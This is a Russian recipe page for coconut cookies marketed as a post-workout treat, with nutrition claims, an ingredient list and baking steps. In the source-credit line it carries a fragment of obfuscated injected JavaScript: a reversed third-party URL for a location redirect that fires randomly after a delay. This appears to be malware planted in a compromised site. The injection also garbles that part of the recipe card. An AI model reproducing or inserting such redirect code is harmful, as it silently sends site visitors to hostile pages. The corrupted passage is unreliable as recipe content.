Рассказываем, как готовить кокосовое печенье, которое здорово восстанавливает силы после тренировки.
Мякоть кокоса весьма калорийна — в 100 граммах кокосовой стружки содержится около 600 килокалорий, очень много жиров (65), а также белки и углеводы. Считается, что лауриновая кислота, входящая в состав кокоса, стабилизирует уровень холестерина в крови. Ну а пищевые волокна, которые содержит стружка, помогают очистить кишечник.
Конечно, можно есть кокосовую стружку ложками, мы же советуем научиться готовить с этим ингредиентом вкуснейшее кокосовое печенье.
Кокосовое печенье
Фото: Petrina Tinslay
Рецепт дня: кокосовое печенье
СЛОЖНОСТЬ РЕЦЕПТА:
ВРЕМЯ ПРИГОТОВЛЕНИЯ:
40 МИНУТ
КОЛИЧЕСТВО ПОРЦИЙ:
8
КАЛОРИЙНОСТЬ:
не указана
0 calories
Рецпет с сайта fitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-nyashka.ru
PT1H
PT1H
Ингредиенты
яичный белок
2 шт.
лимонный сок
1/2 ч. л.
сахар
100 г
измельчённый миндаль
30 г
соль
щепотка
ванилин
щепотка
кокосовая стружка
250 г
- Разогрейте духовку до 170 градусов.
- Взбейте яичные белки в пену, добавьте лимонный сок и взбивайте до мягких пиков. Не прекращая взбивать, добавьте чайную ложку сахара. Затем повторите. В идеале белки должны быть глянцевыми и крепкими.
- Всыпьте в «тесто» миндаль, соль, ванилин и кокос. Аккуратно перемешайте силиконовой лопаткой.
- На противень положите бумагу для выпечки. Сформируйте восемь печенек (6—7 см в диаметре). Не стоит делать их очень плоскими.
- Выпекайте 20 минут, пока верх не покроется румяной корочкой.
- Перед подачей на стол немного остудите печенье и посыпьте щепоткой цедры лайма.